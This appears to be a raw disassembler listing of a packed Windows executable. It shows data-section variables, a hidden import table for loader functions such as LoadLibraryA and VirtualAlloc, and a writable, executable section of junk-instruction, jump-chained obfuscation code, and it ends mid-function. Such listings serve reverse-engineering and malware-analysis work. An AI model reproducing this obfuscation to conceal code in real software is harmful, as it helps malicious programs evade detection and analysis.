dword_427AE4 dd 5 ; DATA XREF: sub_4044D2-12Dw
; sub_407CED+30r
dword_427AE8 dd 1 ; DATA XREF: sub_4044D2-127w
dword_427AEC dd 1 ; DATA XREF: sub_40B203+A2w
dword_427AF0 dd 0A02BA8h ; DATA XREF: sub_40B203+A7w
align 8
dword_427AF8 dd 0A02BC8h ; DATA XREF: sub_40AF90+4Bw
; sub_40AF90:loc_40B055r ...
dd 3 dup(0)
off_427B08 dd offset aCM_unpackerPac ; DATA XREF: sub_40B203+37w
; "C:\\m_unpacker\\packed.exe"
align 10h
byte_427B10 db 0 ; DATA XREF: sub_407DBB+2Cw
; sub_4084EB+5r
align 4
dword_427B14 dd 1 ; DATA XREF: sub_407DBB+23w
dword_427B18 dd 1 ; DATA XREF: sub_407DBB+1Br
; sub_407DBB+A0w
dword_427B1C dd 0 ; DATA XREF: sub_408305+27o
dword_427B20 dd 0 ; DATA XREF: sub_408305+22r
dword_427B24 dd 0 ; DATA XREF: sub_408408+4w sub_408412r
dword_427B28 dd 0 ; DATA XREF: sub_4085AF+280w
; sub_408ACB:loc_408B01w ...
dd 3 dup(0)
dword_427B38 dd 6 dup(0) ; DATA XREF: sub_409E64+66o
db 0
byte_427B51 db 3 dup(0) ; DATA XREF: sub_409E64+8Ao
dd 40h dup(0)
db 0
byte_427C55 db 0 ; DATA XREF: sub_409E64+92w
align 4
dd 7Dh dup(0)
dword_427E4C dd 0 ; DATA XREF: sub_403AAC+80r
; sub_409E64+E3o ...
dword_427E50 dd 0 ; DATA XREF: sub_40AA2F+8r
align 8
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40B203+1Do
; .data:off_427B08o
align 4
dd 3Ah dup(0)
byte_427F5C db 0 ; DATA XREF: sub_40B203+24w
align 10h
dword_427F60 dd 1 ; DATA XREF: sub_40B2BC+2r
; sub_40B2BC+24w ...
dword_427F64 dd 77C26E79h ; DATA XREF: sub_40B4CD+43r
; sub_40B539+11w ...
byte_427F68 db 0 ; DATA XREF: sub_40B4CD:loc_40B506r
; sub_40B539+17w ...
align 4
off_427F6C dd offset sub_40C208 ; DATA XREF: sub_40C254+Cr
; sub_40C28B+Bw
dword_427F70 dd 1 ; DATA XREF: sub_40C307+14r
; sub_40C307+3Aw ...
dword_427F74 dd 1 ; DATA XREF: sub_40C6EC+Fr
; sub_40C6EC+37w ...
dword_427F78 dd 0 ; DATA XREF: .data:off_423F3Co
; .data:off_423F40o ...
dword_427F7C dd 77E7C706h ; DATA XREF: sub_40CEAA+4w
; sub_40CEC4+11r ...
dword_427F80 dd 0 ; DATA XREF: sub_40D96D+Ar
dword_427F84 dd 0 ; DATA XREF: sub_40E07F+4w
; sub_40E0D9:loc_40E122o ...
dword_427F88 dd 0 ; DATA XREF: sub_40E07F+9w
; sub_40E0D9:loc_40E178o ...
dword_427F8C dd 0 ; DATA XREF: sub_40E07F+Ew sub_40E0CCr ...
dword_427F90 dd 0 ; DATA XREF: sub_40E07F+13w
; sub_40E0D9:loc_40E184o ...
align 8
dword_427F98 dd 0 ; DATA XREF: sub_40E289+4w
dd 2 dup(0)
dword_427FA4 dd 0 ; DATA XREF: sub_40E293+4w
dd 0Fh dup(0)
dword_427FE4 dd 0 ; DATA XREF: sub_4085AF+6r
dword_427FE8 dd 0 ; DATA XREF: sub_40F8D4+10r
; sub_40F8D4+60w ...
dword_427FEC dd 0 ; DATA XREF: sub_40F8D4+75w
; sub_40F8D4:loc_40FA22r
dword_427FF0 dd 0 ; DATA XREF: sub_40F8D4+82w
; sub_40F8D4+167r
dword_427FF4 dd 0 ; DATA XREF: sub_40F8D4+D0w
; sub_40F8D4:loc_40F9A9r
dword_427FF8 dd 0 ; DATA XREF: sub_40F8D4+BAw
; sub_40F8D4+E1r ...
align 10h
dword_428000 dd 0 ; DATA XREF: sub_40FB1C+Fw
dd 2Fh dup(0)
dword_4280C0 dd 0 ; DATA XREF: sub_410C39:loc_410C61r
byte_4280C4 db 0 ; DATA XREF: sub_410E04:loc_410F40r
align 4
dword_4280C8 dd 0 ; DATA XREF: sub_41A249+4Br
; sub_41A6D9+E6w ...
dword_4280CC dd 0 ; DATA XREF: sub_41A181+14r
; sub_41A1E5+14r ...
dword_4280D0 dd 0 ; DATA XREF: sub_41A10B+1Dr
; sub_41A6D9+136w ...
dword_4280D4 dd 0 ; DATA XREF: sub_41A249+1Cr
; sub_41A6D9+AAw ...
dword_4280D8 dd 0 ; DATA XREF: sub_41A6D9+BEw
; sub_41A6D9+16Dr ...
dword_4280DC dd 0 ; DATA XREF: sub_41A6D9+D2w
; sub_41A6D9+179r ...
dword_4280E0 dd 0 ; DATA XREF: sub_41A181+34r
; sub_41A1E5+34r ...
dword_4280E4 dd 0 ; DATA XREF: sub_41A249+63r
; sub_41A6D9+FAw ...
dword_4280E8 dd 0 ; DATA XREF: sub_41A6D9+14Aw
; sub_41A6D9+322r
dword_4280EC dd 0 ; DATA XREF: sub_41A6D9+96w
; sub_41A6D9+155r ...
dword_4280F0 dd 0 ; DATA XREF: sub_41A181+4Dr
; sub_41A1E5+4Dr ...
dword_4280F4 dd 0 ; DATA XREF: sub_401DA7+70r
; sub_41934D+A9w ...
dword_4280F8 dd 0 ; DATA XREF: sub_40207D+152r
; sub_417C7B+11Dr ...
dword_4280FC dd 0 ; DATA XREF: sub_40207D+14Cr
; sub_417C7B+116r ...
dword_428100 dd 0 ; DATA XREF: sub_40207D+146r
; sub_4195CE+61w
dword_428104 dd 0 ; DATA XREF: sub_40207D+140r
; sub_4195CE+66w
dword_428108 dd 0 ; DATA XREF: sub_40207D+13Ar
; sub_4195CE+71w
dword_42810C dd 0 ; DATA XREF: sub_40207D+12Dr
; sub_4195CE+76w
dword_428110 dd 0 ; DATA XREF: sub_419588r
; sub_419588:loc_4195BDw ...
dword_428114 dd 0 ; DATA XREF: sub_419588+5r
; sub_419588+3Bw ...
dword_428118 dd 0 ; DATA XREF: sub_419588+15r
; sub_419B31+20w ...
dword_42811C dd 0 ; DATA XREF: sub_419B31+25w
dd 33h dup(0)
dword_4281EC dd 2 dup(0) ; DATA XREF: sub_419B31+43o
word_4281F4 dw 0 ; DATA XREF: sub_418B8B+8o
; sub_41934D+AEw ...
word_4281F6 dw 0 ; DATA XREF: sub_41934D+D1w
dword_4281F8 dd 0 ; DATA XREF: sub_41934D+BDw
dd 2 dup(0)
dword_428204 dd 0 ; DATA XREF: sub_41946E+6r
; sub_41946E+73r ...
dword_428208 dd 41h dup(0) ; DATA XREF: sub_418D80+1EDo
; sub_418D80+224o ...
dword_42830C dd 0 ; DATA XREF: sub_418B8B+Dr
; sub_41934D+84w ...
byte_428310 db 0 ; DATA XREF: sub_418D80+293o
; sub_418D80+477o ...
align 4
dd 40h dup(0)
byte_428414 db 0 ; DATA XREF: sub_4022DF:loc_402346r
; sub_41934D+117w ...
align 4
dword_428418 dd 41h dup(0) ; DATA XREF: sub_418D80:loc_418F9Do
; sub_41934D+1Ao
dword_42851C dd 0 ; DATA XREF: sub_40177B+263o
; sub_4019F3+215o ...
byte_428520 db 0 ; DATA XREF: sub_413DDD+53Dr
; sub_418B2F:loc_418B5Fr ...
align 4
dd 8 dup(0)
dword_428544 dd 0 ; DATA XREF: sub_41BBD8+33w
; sub_41BBD8+8Fr ...
dword_428548 dd 40h dup(0) ; DATA XREF: sub_41B9D6+49o
; sub_41BD7B+21o
dword_428648 dd 0 ; DATA XREF: sub_401FDA+Br
; sub_4145BE+75w ...
align 10h
byte_428650 db 0 ; DATA XREF: sub_40207D+16Eo
; sub_41ADC3+D7o ...
align 4
dd 3Fh dup(0)
dword_428750 dd 0 ; DATA XREF: sub_40207D+173r
; sub_41ADC3+45o
dword_428754 dd 0 ; DATA XREF: sub_40207D+181r
; sub_41ADC3:loc_41AF4Ew ...
byte_428758 db 0 ; DATA XREF: sub_4022DF+4BAw
align 4
dd 3Fh dup(0)
dword_428858 dd 0 ; DATA XREF: sub_4022DF+44Dr
; sub_4022DF+486w
dd 3 dup(0)
db 0
byte_428869 db 0 ; DATA XREF: sub_4022DF:loc_402465r
; sub_402800+AFw
align 4
dd 3 dup(0)
dword_428878 dd 0 ; DATA XREF: sub_402800:loc_402889r
dd 330Bh dup(0)
dword_4354A8 dd 0 ; DATA XREF: sub_4028E0+A6r
; sub_418D80+501r ...
db 0
byte_4354AD db 0 ; DATA XREF: sub_4022DF+3Er
; sub_41BBD8:loc_41BC14w ...
align 10h
dword_4354B0 dd 0 ; DATA XREF: sub_41BBD8+13Bw
dword_4354B4 dd 0 ; DATA XREF: sub_4028E0+90r
; sub_41B9D6:loc_41BB44w ...
word_4354B8 dw 0 ; DATA XREF: sub_401E4D+A6w
; sub_401E4D+BAw
align 10h
byte_4354C0 db 0 ; DATA XREF: sub_4148FB+9Fr
; sub_4148FB+1B4r ...
align 4
dd 31h dup(0)
db 2 dup(0)
word_43558A dw 0 ; DATA XREF: sub_414B1C+56o
dd 2Bh dup(0)
byte_435638 db 0 ; DATA XREF: sub_4148FB:loc_414956o
; sub_4148FB:loc_4149C7r ...
db 2 dup(0)
byte_43563B db 0 ; DATA XREF: sub_4148FB+119w
dd 2 dup(0)
db 2 dup(0)
byte_435646 db 0 ; DATA XREF: sub_4148FB+8Ew
; sub_4148FB+1A3w
align 4
db 2 dup(0)
byte_43564A db 0 ; DATA XREF: sub_4148FB+94w
; sub_4148FB+1A9w
align 10h
byte_435650 db 0 ; DATA XREF: sub_4148FB+A7w
; sub_4148FB+BFw ...
align 4
dd 56h dup(0)
dword_4357AC dd 0 ; DATA XREF: sub_417E66+110o
; sub_41C283+43o ...
dword_4357B0 dd 0 ; DATA XREF: sub_417E66+109r
; sub_417E66+122r ...
dword_4357B4 dd 0 ; DATA XREF: sub_40121E+20r
; sub_40121E:loc_40127Bw ...
dword_4357B8 dd 0 ; DATA XREF: sub_401E4D+D3o
; sub_401FDA+22o ...
dword_4357BC dd 0 ; DATA XREF: sub_401E4D+C8r
; sub_401E4D:loc_401F2Dr ...
dword_4357C0 dd 0 ; DATA XREF: sub_4016BA+20r
; sub_4016BA:loc_401717w ...
off_4357C4 dd offset off_420BCC ; DATA XREF: .text:0041CB87o
; .text:0041CB91w
off_4357C8 dd offset off_420BC4 ; DATA XREF: .text:0041CB6Bo
; .text:0041CB75w
off_4357CC dd offset off_420C48 ; DATA XREF: .text:0041CBBFo
; .text:0041CBC9w
off_4357D0 dd offset off_420C50 ; DATA XREF: .text:0041CBDBo
; .text:0041CBE5w
off_4357D4 dd offset off_420C40 ; DATA XREF: .text:0041CBA3o
; .text:0041CBADw
off_4357D8 dd offset off_420C68 ; DATA XREF: .text:0041CBF7o
; .text:0041CC01w
off_4357DC dd offset off_420CBC ; DATA XREF: .text:0041CC2Fo
; .text:0041CC39w
off_4357E0 dd offset off_420CB4 ; DATA XREF: .text:0041CC13o
; .text:0041CC1Dw
off_4357E4 dd offset off_420D7C ; DATA XREF: .text:0041CC4Bo
; .text:0041CC55w
off_4357E8 dd offset off_420D84 ; DATA XREF: .text:0041CC67o
; .text:0041CC71w
dword_4357EC dd 2080Ah ; DATA XREF: sub_41AFF3+4EBr
; .text:0041CC85w
off_4357F0 dd offset off_420EDC ; DATA XREF: .text:0041CCADo
; .text:0041CCB7w
off_4357F4 dd offset off_420EE4 ; DATA XREF: .text:0041CCC9o
; .text:0041CCD3w
off_4357F8 dd offset off_420ED4 ; DATA XREF: .text:0041CC91o
; .text:0041CC9Bw
dword_4357FC dd 1 ; DATA XREF: sub_404170r sub_40ACDFw ...
dword_435800 dd 1 ; DATA XREF: sub_407720+28r
; sub_407F20+1Er ...
dword_435804 dd 0 ; DATA XREF: sub_40AA2F+34r
dword_435808 dd 20h ; DATA XREF: sub_408B90+3Cw
; sub_408B90+BFw ...
dd 5 dup(0)
dword_435820 dd 0A020B0h ; DATA XREF: sub_406B86+FDr
; sub_40843A+87r ...
dd 3Fh dup(0)
dword_435920 dd 0A03188h ; DATA XREF: sub_40843A+2Bw
; sub_40843A+44w ...
dd 7 dup(0)
dword_435940 dd 400h dup(0) ; DATA XREF: .data:off_423950o
; .data:00423958o
dword_436940 dd 200h ; DATA XREF: sub_40843Ar
; sub_40843A:loc_408454w ...
dword_436944 dd 0 ; DATA XREF: sub_407F15w
dword_436948 dd 1 ; DATA XREF: sub_40AF90+B3w
dword_43694C dd 0A0310Ch ; DATA XREF: sub_4030D5+10r
; sub_4030D5+9Bw ...
dword_436950 dd 0A03100h ; DATA XREF: sub_4030D5+5r
; sub_4030D5+87w ...
dword_436954 dd 1 ; DATA XREF: sub_4051B3r
; sub_4051B3+11w ...
dword_436958 dd 0 ; DATA XREF: sub_407D29:loc_407D92r
; sub_407D29+74o ...
dword_43695C dd 0 ; DATA XREF: sub_405E8D+28w
; sub_405ED5r ...
dword_436960 dd 0 ; DATA XREF: sub_405E8D+15w
; sub_405ED5+6r ...
dword_436964 dd 0 ; DATA XREF: sub_403A5D+13r
; sub_405E8D+36w ...
dword_436968 dd 0 ; DATA XREF: sub_405E8D+2Fw
; sub_405F00+2FCw ...
dword_43696C dd 0 ; DATA XREF: sub_405E8D+3Cw
; sub_406214r ...
dword_436970 dd 0 ; DATA XREF: sub_405F00+229r
; sub_405F00+249r ...
dword_436974 dd 1 ; DATA XREF: sub_402E11:loc_402E4Ar
; sub_4039CF+13r ...
dword_436978 dd 152340h ; DATA XREF: sub_4044D2-CDw
; sub_40AF33:loc_40AF44r ...
align 800h
_data ends
; Section 5. (virtual address 00038000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00038000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_99cvbjdu segment para public 'DATA' use32
assume cs:_99cvbjdu
;org 438000h
dword_438000 dd 380CCh, 0 ; DATA XREF: sub_48D0F6+9o
dd 0FFFFFFFFh, 3803Ch, 380B4h, 38108h, 0
dd 0FFFFFFFFh, 380E8h, 38104h, 5 dup(0)
aKernel32_dl_11 db 'kernel32.dll',0
align 4
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
dd 694C6461h, 72617262h, 4179h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 0
dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
dd 6C6C416Ch, 636Fh, 69560000h, 61757472h, 6572466Ch, 65h
dd 77E79F93h, 77E805D8h, 77E7A5FDh, 77E75CB5h, 77E7980Ah
dd 77E79E34h, 3804Ch, 38060h, 38070h, 38084h, 38094h, 380A4h
dd 0
aUser32_dll_1 db 'user32.dll',0
align 4
dd 654D0000h, 67617373h, 786F4265h, 41h, 77D6ADD7h, 380F4h
dd 3BDh dup(0)
_99cvbjdu ends
; ---------------------------------------------------------------------------
; Section 6. (virtual address 00039000)
; Virtual size : 00022000 ( 139264.)
; Section size in file : 00022000 ( 139264.)
; Offset to raw data for section: 00039000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
ut7h7i2x segment para public 'CODE' use32
assume cs:ut7h7i2x
;org 439000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
loc_439000: ; CODE XREF: ut7h7i2x:00439627j
; DATA XREF: znnrn47v:0046D584o
mov ebp, [eax]
add eax, 4
call sub_44577E
loc_43900A: ; CODE XREF: ut7h7i2x:0043BBDCj
jle loc_44B3E3
jnb loc_44E732
jmp loc_439AB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_43901B: ; CODE XREF: sub_446258+7C0Ej
pop eax
and eax, 9FEBCCD1h
rol eax, 1Dh
loc_439025: ; CODE XREF: ut7h7i2x:00439DC5j
or eax, 6DEECF3Ch
add eax, 0C3FC50B2h
add eax, ebp
add eax, 0BC04BD36h
jmp loc_44F196
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
pushf
jmp sub_4522DD
; ---------------------------------------------------------------------------
loc_439044: ; CODE XREF: ut7h7i2x:00457008j
push ecx
push 0F4B7A77Bh
pop ecx
add ecx, 4B3CCBD6h
and ecx, 43343EF6h
or ecx, 16A3B335h
jmp loc_44AD52
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_190. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4482AE
loc_439063: ; CODE XREF: sub_4482AE+Dj
jmp sub_453FFB
; END OF FUNCTION CHUNK FOR sub_4482AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A8C1
loc_439068: ; CODE XREF: sub_45A8C1:loc_44C3D5j
pop eax
or eax, 4872988h
and eax, 0DA5C60C2h
sub eax, ds:4000F4h
xor eax, 153501B7h
add eax, ebp
jmp loc_43A4F9
; END OF FUNCTION CHUNK FOR sub_45A8C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431FF
loc_439088: ; CODE XREF: sub_4431FF+16787j
push 424C8377h
pop eax
xor eax, 0C01FD539h
or eax, 0EC292AEh
jnz loc_43FCD5
loc_4390A0: ; CODE XREF: sub_4462B0+E4F4j
jmp loc_44B0C0
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5DC
loc_4390A5: ; CODE XREF: sub_44D5DC+Dj
jmp loc_45295F
; END OF FUNCTION CHUNK FOR sub_44D5DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_4390AA: ; CODE XREF: sub_4402A5+5E24j
jmp loc_459E29
; END OF FUNCTION CHUNK FOR sub_4402A5
; ---------------------------------------------------------------------------
mov ecx, 1CF00606h
adc ecx, 7CCA67A0h
jmp loc_4575A4
; =============== S U B R O U T I N E =======================================
sub_4390BF proc near ; CODE XREF: sub_43AC9C+5p
; ut7h7i2x:00449253j
xchg ebx, [esp+0]
pop ebx
mov ds:dword_43C444, eax
retn
sub_4390BF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4390C9: ; CODE XREF: ut7h7i2x:004597B9j
push offset loc_457CC8
jmp loc_4493F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455E0B
loc_4390D3: ; CODE XREF: sub_455E0B:loc_454F77j
jns loc_447F82
jmp loc_43B1AD
; END OF FUNCTION CHUNK FOR sub_455E0B
; =============== S U B R O U T I N E =======================================
sub_4390DE proc near ; CODE XREF: sub_457AEF-AD18p
; ut7h7i2x:00453920j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0045868E SIZE 0000001A BYTES
xchg edi, [esp+0]
pop edi
push ebp
mov ebp, eax
xchg ebp, [esp+0]
push 4670CB23h
jmp loc_45868E
sub_4390DE endp
; ---------------------------------------------------------------------------
mov ds:off_41D0A4, eax
lea eax, loc_43EFB4
push offset sub_44AFFD
jmp locret_450B43
; ---------------------------------------------------------------------------
sub eax, 50E5DD38h
rol eax, 11h
add eax, 12E9A168h
rol eax, 1Ch
loc_43911A: ; CODE XREF: ut7h7i2x:00443564j
xor eax, 10C9AECAh
sub eax, 2089BB1Dh
mov ds:dword_44B964, eax
jmp loc_44DE3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_439131: ; CODE XREF: sub_44825D:loc_452435j
sub al, 99h
push 4D40D25Ah
pop edx
or edx, 96A6C2ACh
xor edx, 0D1513653h
jmp loc_43C8F6
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CBC2
loc_43914A: ; CODE XREF: sub_44CBC2+13j
cmp dword ptr [ebp-4], 0
jnz loc_439163
lea eax, [ebp-125h]
push eax
call sub_43CA2D
mov [ebp-4], eax
loc_439163: ; CODE XREF: sub_44CBC2-13A74j
; sub_4431E4:loc_442E94j ...
mov eax, [ebp-1Ch]
call sub_439B17
jmp loc_443749
; END OF FUNCTION CHUNK FOR sub_44CBC2
; =============== S U B R O U T I N E =======================================
sub_439170 proc near ; CODE XREF: sub_45967C-1DB30p
; ut7h7i2x:00459D74j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004441F3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00446210 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C83A SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044D9BB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044E988 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004530A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457D10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A63A SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
push esi
pushf
push 0C140EF18h
pop esi
sub esi, 0B845812h
rol esi, 1Bh
jmp loc_446210
sub_439170 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43918A proc near ; DATA XREF: ut7h7i2x:0045390Bo
push eax
push offset sub_4420DC
jmp nullsub_531
sub_43918A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_439195: ; CODE XREF: sub_43C1D2+18AA9j
pop ecx
xor ecx, 4069BA42h
and ecx, 0A92EF0Dh
cmp ecx, 53C5477Eh
jmp loc_452A0F
; END OF FUNCTION CHUNK FOR sub_43C1D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_4391AD: ; CODE XREF: sub_4524FE-14983j
jb loc_4409CA
or eax, edx
jmp loc_451185
; END OF FUNCTION CHUNK FOR sub_4524FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_4391BB: ; CODE XREF: sub_444374+14j
jmp loc_456161
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589C7
loc_4391C0: ; CODE XREF: sub_4589C7-14B79j
jmp nullsub_71
; END OF FUNCTION CHUNK FOR sub_4589C7
; ---------------------------------------------------------------------------
loc_4391C5: ; CODE XREF: ut7h7i2x:0043BEE0j
jmp loc_44DE4B
; ---------------------------------------------------------------------------
and edx, 195293BFh
and edi, 29057EF3h
jmp sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_4391DB: ; CODE XREF: sub_44865D:loc_446656j
jz loc_449461
jmp loc_44B9DB
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
loc_4391E6: ; DATA XREF: sub_4439B0+1o
mov ebp, esp
push edx
mov edx, ecx
xchg edx, [esp]
call sub_458007
; START OF FUNCTION CHUNK FOR sub_441AED
loc_4391F3: ; CODE XREF: sub_441AED-6030j
jo sub_440B52
loc_4391F9: ; CODE XREF: sub_441AED:loc_4433F8j
call sub_44C068
mov edx, 87C4571Ah
push eax
mov eax, edx
push offset loc_457CEB
loc_43920B: ; CODE XREF: sub_4427E3j
jmp nullsub_433
; END OF FUNCTION CHUNK FOR sub_441AED
; ---------------------------------------------------------------------------
locret_439210: ; CODE XREF: ut7h7i2x:00450589j
retn
; ---------------------------------------------------------------------------
loc_439211: ; CODE XREF: ut7h7i2x:00450C5Aj
jmp loc_452771
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_439216: ; CODE XREF: sub_44865D-70D8j
jmp sub_43F3D1
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
jo loc_44087D
jmp loc_454275
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_439226: ; CODE XREF: sub_459653-E42Bj
mov eax, [eax]
add eax, [ebp-4]
call sub_439B17
cmp eax, [ebp-8]
jnz loc_456501
jmp loc_441956
; END OF FUNCTION CHUNK FOR sub_459653
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_43923E: ; CODE XREF: sub_449DC4:loc_449DCDj
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43EBFE
jmp loc_452FC7
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
loc_43924D: ; CODE XREF: ut7h7i2x:loc_452CB6j
call sub_43AA94
push edi
push 71944D41h
pop edi
or edi, 0DB8CD078h
xor edi, 139D766Eh
jmp loc_44CF71
; ---------------------------------------------------------------------------
sub edx, 0CA35CC8Bh
jmp sub_44305D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_439275: ; CODE XREF: sub_4544E6+3BB9j
jnz loc_4428E0
jmp loc_44C006
; END OF FUNCTION CHUNK FOR sub_4544E6
; =============== S U B R O U T I N E =======================================
sub_439280 proc near ; CODE XREF: ut7h7i2x:004441A6j
; ut7h7i2x:0045AA76p
; FUNCTION CHUNK AT 0043D706 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044620B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447C52 SIZE 0000000F BYTES
xchg edi, [esp+0]
pop edi
push esi
mov esi, eax
xchg esi, [esp+0]
ror eax, 15h
jmp loc_447C52
sub_439280 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_217. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_439293: ; CODE XREF: ut7h7i2x:004585E6j
jmp loc_4493CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_439298: ; CODE XREF: sub_44C99C+Fj
jmp loc_452CD5
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
loc_43929D: ; CODE XREF: ut7h7i2x:loc_448C35j
jnz loc_446489
jmp loc_453CC9
; ---------------------------------------------------------------------------
loc_4392A8: ; CODE XREF: ut7h7i2x:0044AEBEj
jo loc_43C8D0
; =============== S U B R O U T I N E =======================================
sub_4392AE proc near ; CODE XREF: ut7h7i2x:0045A43Fp
; FUNCTION CHUNK AT 0043B7D8 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov ebx, [eax+4]
mov eax, [eax]
jnz loc_442F16
jmp loc_43B7D8
sub_4392AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4392C2: ; CODE XREF: ut7h7i2x:004425C2j
call sub_43EE25
push ebx
mov ebx, esi
xchg ebx, [esp]
jmp loc_43B3A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_4392D2: ; CODE XREF: sub_44E2C4:loc_4597AFj
mov eax, 6
call sub_4431A3
; END OF FUNCTION CHUNK FOR sub_44E2C4
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_4392DC: ; CODE XREF: sub_43CCC3-A8Dj
jmp loc_44735F
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
loc_4392E1: ; CODE XREF: ut7h7i2x:0044CCC9j
xor edi, 8F9BA4C4h
push offset sub_4408DB
jmp locret_452600
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_4392F1: ; CODE XREF: ut7h7i2x:loc_448D87j
; sub_44B68F+1C10j
and ecx, ebp
or eax, ebx
loc_4392F5: ; CODE XREF: sub_44B68F:loc_4505EEj
push edx
push 0E33FB043h
pop edx
xor edx, 39C4AAB1h
and edx, 0E2BD2BECh
jmp loc_44572F
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
locret_43930D: ; CODE XREF: ut7h7i2x:loc_443744j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447928
loc_43930E: ; CODE XREF: sub_447928+Cj
push ecx
push 0BB4103C1h
xchg eax, [esp+0Ch+var_C]
mov ecx, eax
pop eax
or ecx, 9F6DFD98h
add ecx, 40D60F0Eh
jmp loc_448423
; END OF FUNCTION CHUNK FOR sub_447928
; ---------------------------------------------------------------------------
loc_43932B: ; CODE XREF: ut7h7i2x:loc_44E46Aj
; DATA XREF: sub_452D3D:loc_44E460o
xchg eax, [esp]
mov edx, eax
pop eax
mov eax, [esp]
call sub_459D9F
; START OF FUNCTION CHUNK FOR sub_459F30
loc_439339: ; CODE XREF: sub_459F30+Aj
jmp nullsub_413
; END OF FUNCTION CHUNK FOR sub_459F30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F613
loc_43933E: ; CODE XREF: sub_44F613+7j
jmp loc_445037
; END OF FUNCTION CHUNK FOR sub_44F613
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_439343: ; CODE XREF: sub_447CBE+Bj
xor ebx, 228C6B91h
cmp ebx, 0F4B5A4Fh
jmp loc_44477C
; END OF FUNCTION CHUNK FOR sub_447CBE
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_439354 proc near ; DATA XREF: sub_43A2F5+35D5o
jmp loc_44D830
sub_439354 endp
; ---------------------------------------------------------------------------
xchg ebp, [esp]
mov ecx, ebp
pop ebp
push offset loc_43C1C6
jmp loc_445E93
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_439369: ; CODE XREF: sub_439AE7:loc_446886j
jnz loc_44AF3B
jmp loc_450461
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442AD1
loc_439374: ; CODE XREF: ut7h7i2x:0043B759j
; sub_442AD1:loc_44F8DCj
call sub_4417AF
push offset loc_43DC27
jmp nullsub_165
